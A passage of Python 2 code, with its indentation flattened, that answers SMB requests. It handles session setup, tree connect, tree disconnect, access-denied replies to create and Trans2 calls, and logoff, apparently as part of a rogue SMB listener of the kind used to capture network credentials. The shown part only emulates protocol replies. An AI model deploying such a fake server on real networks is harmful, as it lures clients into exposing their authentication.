flag1="\x98",
flag2="\x01\xc8",
errorcode="\x00\x00\x00\x00",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = SMBSession2Accept()
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(
''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x75\x00": # Tree Connect AndX Request
ParseShare(data)
Header = SMBHeader(cmd="\x75",
flag1="\x88",
flag2="\x01\xc8",
errorcode="\x00\x00\x00\x00",
pid=pidcalc(data),
tid=chr(randrange(256)) +
chr(randrange(256)),
uid=uidcalc(data),
mid=midcalc(data))
Body = SMBTreeData()
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x71\x00": #Tree Disconnect
Header = SMBHeader(cmd="\x71",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x00\x00\x00\x00",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\xa2\x00": #NT_CREATE Access Denied.
Header = SMBHeader(cmd="\xa2",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x22\x00\x00\xc0",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x25\x00": # Trans2 Access Denied.
Header = SMBHeader(cmd="\x25",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x22\x00\x00\xc0",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x74\x00": # LogOff
Header = SMBHeader(cmd="\x74",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x22\x00\x00\xc0",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x02\xff\x00\x27\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except socket.timeout:
pass